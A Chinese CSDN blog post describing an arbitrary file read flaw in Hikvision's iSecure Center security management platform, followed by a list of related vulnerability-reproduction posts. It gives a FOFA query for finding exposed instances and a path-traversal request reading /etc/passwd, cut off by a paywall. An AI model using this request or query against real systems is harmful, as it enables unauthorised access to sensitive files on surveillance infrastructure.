海康威视综合安防管理平台 files 文件读取漏洞

最新推荐文章于 2025-03-26 08:09:11 发布

hacker?

最新推荐文章于 2025-03-26 08:09:11 发布

阅读量2.2k

点赞数 48

文章标签：网络安全

本文链接：https://blog.csdn.net/m0_71285176/article/details/135505311

版权

本文介绍了海康威视综合安防管理平台存在的文件读取漏洞，攻击者可访问敏感文件。漏洞复现和POC提供，建议用户及时联系厂家升级至最新版本以修复此安全问题。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

免责声明：

本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

一、漏洞名称

海康威视综合安防管理平台 files 文件读取漏洞

二、漏洞影响

综合安防管理平台

三、漏洞描述

HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台，通过接入视频监控、一卡通、停车场、报警检测等系统的设备。在其某接口处存在任意文件读取漏洞，攻击者可以读取系统任意敏感文件。

四、FOFA搜索语句

FOFA语句："综合安防管理平台"

五、漏洞复现

GET /lm/api/files;.css?link=/etc/passwd HTTP/1.1
Host: xxx.xxx.xxxx
Connection: ke

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

hacker?

关注关注

48
点赞
踩
34

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

海康威视综合安防管理平台 orgManage/v1/orgs/download 任意文件读取漏洞复现

0xSec

05-31

1761

海康威视综合安防管理平台 orgManage/v1/orgs/download 接口处存在任意文件读取漏洞，未经身份验证的远程攻击者可利用目录遍历的方式绕过权限认证直接读取后台服务器配置文件等敏感文件，造成信息泄露，使系统处于极不安全的状态。

海康威视iVMS-8700综合安防管理平台文件读取漏洞复现

0xSec

12-13

2711

HIKVISION iVMS 综合安防管理平台download接口处存在任意文件读取漏洞，攻击者通过构造token绕过身份认证，读取服务器中的目录信息与敏感文件。使系统处于极不安全的状态。

参与评论您还未登录，请先登录后发表或查看评论

2025年最新CVE-2017-7921漏洞复现

最新发布

2303_78851087的博客

03-26

858

2025年最新CVE-2017-7921漏洞复现

Hikvision综合安防管理平台files；.css接口存在任意文件读取漏洞附POC软件

nnn2188185的博客

01-23

1006

微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备。

海康威视iSecure-Center 综合安防管理平台 download 任意文件读取漏洞

WuYSec的博客

06-12

983

海康威视iSecure-Center综合安防管理平台是一款“集成化”、“智能化”的平台，能够接入视频监控、一卡通、停车场、报警检测等系统设备。通过海康威视的集成化综合管理软件平台，可以对接入的视频监控点进行集中管理，实现统一部署、统一配置、统一管理和统一调度。海康威视iSecure-Center综合安防管理平台/orgManage/v1/orgs/download接口存在任意文件读取漏洞，可通过此漏洞读取任意文件。

02_【复现】海康威视综合安防管理平台任意文件读取

fushuang333的博客

12-29

1305

海康威视综合安防管理平台任意文件读取。海康威视综合安防管理平台是一款基于云计算、大数据、人工智能技术构建的智能化综合安防平台。

「漏洞复现」海康威视-综合安防管理平台-files-文件读取

知黑而守白

12-29

313

HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台，通过接入视频监控、一卡通、停车场、报警检测等系统的设备。综合安防管理平台 files 接口处存在任意文件读取漏洞，攻击者可以读取系统任意敏感文件。

海康威视-综合安防管理平台-files-文件读取

weixin_43567873的博客

03-13

292

海康威视-综合安防管理平台-files-文件读取

Hikvision综合安防管理平台files；.css接口存在任意文件读取漏洞

weixin_43567873的博客

03-09

371

Hikvision综合安防管理平台files;.css接口存在任意文件读取漏洞

【漏洞复现】Hikvision综合安防管理平台任意文件读取漏洞

晚风不及你

01-22

2603

Hikvision（海康威视）是一家在中国颇具影响力的安防公司，其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。

海康威视isecure center 综合安防管理平台任意文件上传漏洞

holyxp的博客

07-02

4842

HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台，通过接入视频监控、一卡通、停车场、报警检测等系统的设备，获取边缘节点数据，实现安防信息化集成与联动，以电子地图为载体，融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、统一配置、统一管理和统一调度。

海康威视iSecure Center 综合安防管理平台detection接口存在远程命令执行漏洞

xiaokp7的博客

07-24

1480

【漏洞复现】Hikvision综合安防管理平台files文件上传漏洞

晚风不及你

01-22

1092

海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)

qq_50854662的博客

06-30

2757

海康威视iVMS综合安防系统任意文件上传漏洞复现（0day）

海康威视视频编码设备接入网关存在任意文件读取漏洞

nnn2188185的博客

04-27

906

海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。杭州海康威视系统技术有限公司流媒体管理服务器存在任意文件读取漏洞。

海康威视iSecure Center综合安防管理平台 config.properties信息泄漏漏洞

菜鸟学渗透

08-21

1131

海康威视iSecure Center综合安防管理平台 config.properties信息泄漏漏洞

海康威视iSecure Center综合安防管理平台center任意文件上传漏洞

bmaoHk的博客

10-03

865

海康威视综合安防管理平台Fastjson远程命令执行漏洞

holyxp的博客

07-24

2384

综合安防管理平台基于 " 统一软件技术架构" 理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、配置、管理和调度。

海康综合安防管理平台远程命令执行漏洞（CNVD-2024-18673）复现

fly夏天的博客

06-19

4682

海康综合安防管理平台远程命令执行漏洞（CNVD-2024-18673）复现